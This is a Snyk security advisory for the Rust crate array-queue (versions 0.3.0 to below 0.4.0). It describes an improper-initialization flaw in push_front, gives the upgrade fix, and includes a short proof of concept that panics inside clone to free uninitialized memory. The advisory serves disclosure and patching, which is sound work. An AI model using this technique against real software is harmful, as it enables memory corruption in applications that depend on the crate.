Improper Initialization Affecting array-queue package, versions >=0.3.0 <0.4.0
Threat Intelligence
Exploit Maturity
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Proof of Concept
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk IDSNYK-RUST-ARRAYQUEUE-12485340
- published4 Sept 2025
- disclosed2 Sept 2025
- creditGeorge Androutsopoulos
Introduced: 2 Sep 2025
New CVE NOT AVAILABLE CWE-665 (opens in a new tab)Common Weakness Enumeration (CWE) is a category system for software weaknesses
How to fix?
Upgrade array-queue to version 0.4.0 or higher.
Overview
array-queue is a Fixed size bidirectional queues based on arrays.
Affected versions of this package are vulnerable to Improper Initialization via the array_queue::ArrayQueue::push_front function. An attacker can trigger deallocation of uninitialized memory by causing a panic during the clone operation on an argument passed to this function, which leaves the internal state inconsistent and leads to unsafe memory operations when the structure is dropped.
PoC
#![forbid(unsafe_code)]
use array_queue::*;
struct StructA(String);
impl Clone for StructA {
fn clone(&self) -> Self {
if self.0.len() == 11{
panic!("PANIC HERE!")
}
StructA(self.0.clone())
}
}
fn main() {
let mut queue = ArrayQueue::<[StructA; 2]>::new();
let _ = queue.push_front(&StructA(String::from("0123456789")));
let _ = queue.push_front(&StructA(String::from("0123456789X")));
}